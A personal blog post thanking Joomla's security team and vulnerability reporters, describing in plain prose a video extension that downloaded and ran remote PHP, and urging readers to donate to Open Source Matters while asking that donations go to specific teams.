Thank Your Friendly Joomla Security Strike Team

The JSST: It's just like the TSA, except in every regard.This is just a quick intermission, as I delay properly marketing the 1A Landing Page kit, to thank and give kudos to the Joomla Security Strike Team (JSST) and all the researchers contributing their findings via the Vulnerable Extensions List reporting system. They've put out a solid burst of work in recent months, the latter in particular, by investigating extensions for security flaws. 

To talk to the entrepreneur class for a moment: if you want Joomla to be a lower cost investment for you, an ounce of prevention is worth a ton of cure. We have a saying on the internet: please help keep this free, by paying for it. From the various Pizza Bugs & Fun weekends, and similar events taking place around the world at any given time; to the JSST and VEL teams, those people who go looking for trouble of a more time-sensitive nature; you have high incentive to reward those people, right now.

Yes, this is a blog post about why you should give money to people who aren't me.

In volunteerism, things work in cycles. When you have volunteers who are focused and who gel well in their roles, you get leaps of great progress -- management permitting. But what causes things to flow in the opposite direction? Warm weather is one thing - if you're not being paid, and you're not being forced to kill time indoors, online volunteerism, and online activity of all sorts, naturally wanes. Indeed, the frigid season may account for what I'm about to show you.

But being taken for granted also takes its toll, and I think sometimes Joomla is guilty of asking for money too infrequently. Here is a screenshot of the emails I've kept from the Joomla security email lists.

A screenshot showing a list of Joomla security emails, taken March 1, 2016, highlighting the dates of a high concentration of emails in recent months.Every one of those emails has potentially saved your ass.
I'm guessing you have no idea how exciting this is. I'll explain. By the way, not one of these emails asked me for money -- and that might be a problem.

What you're seeing above is a screen capture of my email inbox; filtered down to emails from the Joomla security departments. As you can see, activity is choppy; highlighted in a blue rectangle, we have a great burst of work; preceding that, however, is a period where nobody's reporting extension vulnerabilities.

In recent months, during an uptick in Joomla security volunteering, one of the longest-existing and most popular free video-player extensions, which has been around for years, which has I believe the most features of all free options, was found to have a major security flaw. Another video extension specific to playing YouTube -- and which was named such that anyone looking to play YouTube videos on Joomla, would leap straight to at least downloading and evaluating that specific extension -- was also found with major security flaws. I'm not just dropping the word "major" in here to be dramatic. One of these recently-discovered flaws, subjected to public scrutiny thanks to the JSST, was importing PHP files to the host server from 3rd party servers. That's right: a popular video script was phoning home for new marching orders, saving a new script without telling you, and then running that script on your website. Did you know that? Here's another important question: did you buy something nice for the people who found it for you?

Here is the only place I can find where donations can be sent directly to support the Joomla project; however, please be aware that your donation is not directly given to the tech people. Former insiders have often said the budget is abused to create a jet-setting lifestyle for the corporate people attached to the project. I have no evidence of that but it's my observation that this project does not make progress at a pace, or at a level of quality, befitting its popularity. Drupal and Wordpress are both improving far faster and with far higher fidelity, and then we have these warnings that the funds are off-balance. You have been warned -- at the moment (and this is a big gripe of mine) there is no way to quickly, directly, and easily donate to a specific team such as the JSST -- you can only allow Open Source Matters decide the budget, and that may not be the best thing.

No matter what I, or anyone else may say about the management system in place for the Joomla project, the above image proves the grunts in the trenches have been doing their part. I strongly recommend that anyone who wants Joomla to get stronger and stay that way, give at least $15 to $50 to Open Source Matters, but I also recommend you leave a comment in the official Joomla Forums, asking for a way to prioritize your donations in specific ways. There are the people who are serving the users, and then there are people spending money for other reasons. In a publicly funded open source project, I think each person donating, should decide the focus of their money, even if the management must "tax" that fund for their own reasons.

XSS' is not TMI, OK?
Perhaps while you're at it, you can convince them to put a little more information into the reports.

© 2018 Nathan Hawks

Friends are just enemies who've decided to kill you with kindness.
A lover is someone who actually gives a fuck.